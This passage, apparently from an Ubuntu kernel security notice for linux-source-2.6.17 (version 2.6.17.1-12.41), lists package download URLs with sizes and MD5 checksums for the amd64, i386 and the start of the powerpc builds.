http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   314684 855b49aa7415915d8a935ceedc0b4771
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   105980 9b9f7147fed232c2fc56d90773c5eb27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:  1904310 8d7ab13c1355fdf2ccac6291863b8af5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb
  Size/MD5:   906822 b8ea119280393d2ecaebbb4687cf3b27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.41_amd64.deb
  Size/MD5:   910098 5ac08554cd7ef8b376bab0be799ee24c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_amd64.deb
  Size/MD5:  7429904 6bb0ad99b25007fe4a3027a93dbb5f3f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb
  Size/MD5: 23873330 b5e42e61008b93d405b10ed2e37c5085
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_amd64.deb
  Size/MD5: 24448136 71799e57ed00440061acaa79217439a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_amd64.deb
  Size/MD5:  2340624 6dd4bc0284c87f5b09078459f0957960
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_amd64.deb
  Size/MD5:  2339472 47a3607cf5b45685282cbd13e24dcf44
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_amd64.deb
  Size/MD5:  1771538 46807ab2bd26adcc2a430b9ef2414733
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    16788 3aa5eccb6772c1c9d89396c93c96a0a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   279176 473c8c18b1caed5f000e26d436e59d0f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   256916 7307e06f46448b2679381bfce9dd6ff5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:  1048468 2abd1fef2e34a4dba512bfd840a8ab58
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:  2103898 e2a8f855a1c71776ef2ccef10b19547d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   164432 4161c56c5aadaf6017a7f5a17f516c98
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    10502 7ff5d62d57d1f600f2a941f71118c0cf
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    93364 377ddc29f9d0a225cbeccf6024ed3bd8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    52570 b02078ae7fe65152b70162ed23308408
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    39804 04f72ee8cf83b5cd99e3015ace825094
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    79812 04228c70da1a6612309409b7a90a120f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:     6334 60de3d973103bd26d3dc2f54cefb856b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:     9372 ee591b3f8efe0c8f494372d764cf4a79
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    62720 036e650f1e2370ae83d0c6d2e40f0b78
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   138626 9a8a28499ccb16f86d4f11be74f8daf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   115694 ec57055245feb642932298995b1c711e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    90606 a004d2d8d9b8cd7eeb995373ac490ec2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:  1286182 663cdd07feff2bfdc92455eb455e07d9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    80596 7c60a6a53aa20971b86a690805a4502a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    13478 fc373244f4655c4431c4146a85caffd5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    76278 49121f16220fa17ef334135a8656ae3c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    36064 5750191512c6029ce217dd280db1a08e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   151842 052e8c380401bb227e65a4d4cc98a39a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:    53544 03719e52d55c4acb8b4a347d6632584e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_amd64.udeb
  Size/MD5:   323446 4c72d0968b1de7d289c2a9130bccbe89

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    21210 9510311672bd693480f110c757a91998
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/acpi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    23812 fb2e58840c7777436c6228116595bda1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    43872 767eb7ebf75c9096b34a536d6fdb0f46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    44474 7696fa8379ed4969394718dbdb28291c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   104802 d7545efcfc8d2c9f3912ffbd5a579021
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    49414 a67a49c77dfb15f95d1c6c3c86d42136
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     2362 d4cd0a14a708d6d0990e83c1eada3d8d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     2388 cba02365501509ca84c05051a80e4e18
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    35308 a1469ff2a99207d5e7f9475d6974dd99
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext2-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    36728 b5fccb48e3829ad949f6b8a6c72ddf31
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    98288 dd0f27b57f8c71899deef1f5e4926d5e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ext3-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   103512 113b84ff4e3f891e126c4ca072d757c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    38468 b249d8812f56b3190b88525606bb3247
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fat-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    39218 d85c9a5efcaafedb3f94464f08259c4a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    44258 4b0e010bb3bbb49cfd58961bb6125402
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/fb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    44668 e47d84fcb99bf4def88f19e6dc1015fb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   172756 337d97010e6ada5d3e7c1feb3da1079e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/firewire-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   175180 515b1be35422d7d0990551ec6bf52d55
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    33748 591142321ec2285d50a92dd29daa43b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/floppy-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    34708 8c68a497c61d5122777023e87f06c1d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   140562 43eb25327db6e7c12da28be7b7047772
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ide-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   143824 366cc2124b233f830e5c44d49684f463
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    51750 58da1629078e7c737c0af3e1b4a649bb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/input-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    53172 fdb9b5d217e6ae5203e92c80655e006a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   131600 88d5559b4f733ecb9728c3579becaaa7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ipv6-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   139180 8d890bcca576a66d83f513b5734eb053
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   288306 af75c566015a2cc731dd1deb3e570c02
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/irda-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   290702 0ee0a0eb828a396707253197454a645b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   103542 7e8d620147bd6ed293dce46ecdab9ad1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/jfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   106714 7040843943185f0be1df1dc01c0adcec
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1737778 22b50d5e94b9e7b7ca50824744975751
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/kernel-image-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1802960 150c9bf1da3fd46140fabf504d61a832
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-386_2.6.17.1-12.41_i386.deb
  Size/MD5:   917292 61810421b4fd39f633183e92d3804bcb
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-generic_2.6.17.1-12.41_i386.deb
  Size/MD5:   908720 8f3e333224e56a60ba1fa839a9b06972
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb
  Size/MD5:   920736 f9f4cbb6998594af377df1cae94383a2
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12-server_2.6.17.1-12.41_i386.deb
  Size/MD5:   918694 a89e836481e60e8295c10568521fb016
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-headers-2.6.17-12_2.6.17.1-12.41_i386.deb
  Size/MD5:  7425178 9aa67fb053ecca3c5c9d475dbed9adfe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-386_2.6.17.1-12.41_i386.deb
  Size/MD5: 22851648 c97e45392d212f13ec9a96731a02186e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-generic_2.6.17.1-12.41_i386.deb
  Size/MD5: 22987972 5ef2cf592ec596358c6e02b78ba6d592
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb
  Size/MD5: 23797222 de5c8b4d5c14db82b0fd0358e74c375d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-2.6.17-12-server_2.6.17.1-12.41_i386.deb
  Size/MD5: 23295450 2952a481c7f16f992e80476df38709f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-386_2.6.17.1-12.41_i386.deb
  Size/MD5:  1961980 5afac1e959b044536c20aafd277515a8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-generic_2.6.17.1-12.41_i386.deb
  Size/MD5:  2029996 c2a94101d0d01f15aee853aa49e36cb9
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server-bigiron_2.6.17.1-12.41_i386.deb
  Size/MD5:  2067638 e88db016cd8fb015a3223a02475c1595
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-image-debug-2.6.17-12-server_2.6.17.1-12.41_i386.deb
  Size/MD5:  2029676 1b051e4c57eeb4a7034c693d2bbdf35c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/linux-libc-dev_2.6.17.1-12.41_i386.deb
  Size/MD5:  1771552 bf6dca2e16fc4ae2213b39f31668c431
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    15368 5985a726ec469d88b17e97a7789e0376
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/loop-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    15738 2d0fd50c2b93554e66594640e08be993
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   253320 4a7f0bc31462f13f331f4cf893d7005a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/md-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   263866 b02e15367a02b28b75e5a56ce8733229
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   220354 bb615e5d0185cdfe6590ecb4d8998fae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   227604 60320bc389867b31674510d251b87031
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1048378 958e7ff17559157fb7a953ae531d645e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-firmware-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1048498 0f4267342167e6957815144d4126fe14
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  2092192 0796bd911b3392bc1dca0b650c9fa7bd
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  2142992 88d9b6496923d9dc8608df532717563c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   156870 a6e477fc7474a29c643003856f25ddf3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   152152 2dc85d06b51491c74e02d74f62edbbbe
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     9176 3e6f7e5f4f220e2b98cca56242a8643c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-shared-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     9654 bc27e02955eae9393bc1079d7fb5bcd3
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    79216 321451ba1310580256925668f53b8986
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/nic-usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    81768 55b585802e7c9629c719732f03395363
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    55086 faebe4925bd54435b1724d760ffe1bee
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ntfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    56724 2438bb6f34213c190b945f46006c0ca1
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    34484 260f16152e779368d5b077becd39c357
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/parport-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    35410 869c86fa1eeed27bef128d6d89a1003e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    85870 1fe5b54f587dede7aa6595bfb871828c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    87428 5145f1eb370ffa6f05b6fc25565e7725
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     6080 9d92923af976a45a27ecde8ff3a948f5
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/pcmcia-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     6096 c11277bdc7fae882b4257c2e338b2b43
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     8602 d4a9b2aa0d2f952d94b72ebca55a1601
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/plip-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:     8902 073cd3241cc5a4275b2093c6a1c5ce00
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    52686 72c5a2aa687c01fb134e35aa71d19b42
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ppp-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    55118 ae4b4d0858dc9dcba24d98285438d284
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   129970 b75c31f992ec4eb18424df3e54f6494a
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/reiserfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   132972 0f09435d090729a7461db1de834383df
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    99870 5c3780f614be1b33c5fbcb3b9ed3c61d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/sata-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   101172 840414c7441733e7e25728e7ee750a27
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    79566 721e95573132143fe0a3eec5351b185c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-core-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    80934 77721e781b439ca031e0270591fd261b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1394954 72c4acf78619059a1f75147e17436f46
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/scsi-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:  1398080 320a65e4d464538828ad11356f4ee54b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    69150 85299c42587a91be5fee41c61b35ec45
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/serial-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    71082 8f0769d4a009dcced37d12dac82a35cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    11424 bf7ab78acf84524d9add2b6b0aba100e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/socket-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    11980 b0d76683fae8ac4c9f6517a4a7933960
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    62478 52f70b40e9a2915afe11bacf3d8d5d29
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/speakup-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    63812 241cc60afc04d861a7d947aa400d2b37
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    36004 689c5c5aba993fc9e931702f3475fd01
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/ufs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    36520 646c3c18fd18b4f2bbba1f38d8342d23
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   127286 04af22c9c526bd8878af771b69024ef4
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   131322 ae3f531a702b22855728f15409735da7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    46806 92291f58c9629b44abb4f44aae7beaf8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:    47566 d709606c6c03b1c712e5dd837b4cbffc
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-386-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   311918 e2e20b3e2ea473764b5e566ef3727bd7
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-generic-di_2.6.17.1-12.41_i386.udeb
  Size/MD5:   318712 8db371735ac5251d1ca8b97c7fdc6e84
http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.17/linux-image-kdump_2.6.17.1-12.41_i386.deb
  Size/MD5: 21532894 91695ac9456aa32e4285913d16d4953f

powerpc architecture (Apple Macintosh G3/G4/G5):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    23234 f44fccc1862958c73af06c97ee5d4b26
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/affs-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    26078 8b9e941c2ac45c4d8fd5944658f5f248
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    48586 e5477df7a5cba10af26be502f0635c21
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/cdrom-core-modules-2.6.17-12-powerpc64-smp-di_2.6.17.1-12.41_powerpc.udeb
  Size/MD5:    52028 d0052d4d1c65c5d38c1477a3bbfcc94d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/crc-modules-2.6.17-12-powerpc-di_2.6.17.1-12.41_powerpc.udeb
